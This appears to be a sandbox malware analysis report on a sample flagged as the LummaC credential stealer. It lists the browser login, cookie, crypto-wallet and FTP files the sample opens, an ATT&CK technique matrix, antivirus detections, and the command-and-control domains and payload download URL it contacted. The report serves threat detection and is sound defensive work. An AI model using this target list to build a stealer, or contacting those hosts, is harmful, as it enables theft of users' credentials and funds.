Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	851 Security Software Discovery	Remote Services	31 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	44 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
random.exe	56%	Virustotal		Browse
random.exe	58%	ReversingLabs	Win32.Trojan.Amadey
random.exe	100%	Avira	TR/Crypt.TPM.Gen
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://176.113.115.7:80/mine/random.exekages	0%	Avira URL Cloud	safe
http://176.113.115.7/mine/random.exel	0%	Avira URL Cloud	safe
http://176.113.115.7/mine/random.exeN	0%	Avira URL Cloud	safe
http://176.113.115.7/mine/random.exe1	0%	Avira URL Cloud	safe
https://oreheatq.live/gsoppQ%	100%	Avira URL Cloud	malware
https://oreheatq.live/gsoppyW	100%	Avira URL Cloud	malware
https://oreheatq.live/gsopp	100%	Avira URL Cloud	malware
https://oreheatq.live/	100%	Avira URL Cloud	malware
http://176.11G	0%	Avira URL Cloud	safe
https://wxayfarer.live:443/ALosnzsU	100%	Avira URL Cloud	malware
https://oreheatq.live/gsopphW	100%	Avira URL Cloud	malware
https://oreheatq.live:443/gsoppocal	100%	Avira URL Cloud	malware
http://176.113.115.7/7_9/	0%	Avira URL Cloud	safe
https://oreheatq.live:443/gsoppR	100%	Avira URL Cloud	malware
http://176.113.115.7/mine/ranK.$	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
oreheatq.live	172.67.172.183	true	false		high
wxayfarer.live	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
weldorae.digital/geds	false		high
oreheatq.live/gsopp	false		high
https://oreheatq.live/gsopp	true	Avira URL Cloud: malware	unknown
steelixr.live/aguiz	false		high
smeltingt.run/giiaus	false		high
castmaxw.run/ganzde	false		high
targett.top/dsANGt	false		high
wxayfarer.live/ALosnz	false		high
http://176.113.115.7/mine/random.exe	false		high
ferromny.digital/gwpd	false		high
advennture.top/GKsiio	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.7:80/mine/random.exekages	random.exe, 00000000.00000003.1532257234.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1534936154.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.7/mine/random.exel	random.exe, 00000000.00000003.1532699623.0000000001545000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535128415.0000000001546000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.7/mine/random.exeN	random.exe, 00000000.00000003.1532638142.000000000155B000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535191209.000000000155D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.11G	random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.7/mine/random.exe1	random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535106970.000000000153C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://oreheatq.live/gsoppyW	random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://oreheatq.live/gsoppQ%	random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031585278.000000000154C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oreheatq.live/	random.exe, 00000000.00000002.1537110797.0000000005CF3000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031585278.000000000154C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wxayfarer.live:443/ALosnzsU	random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oreheatq.live/gsopphW	random.exe, 00000000.00000003.955963145.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oreheatq.live:443/gsoppocal	random.exe, 00000000.00000002.1534936154.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.7/7_9/	random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oreheatq.live:443/gsoppR	random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	random.exe, 00000000.00000003.980718065.0000000005D24000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
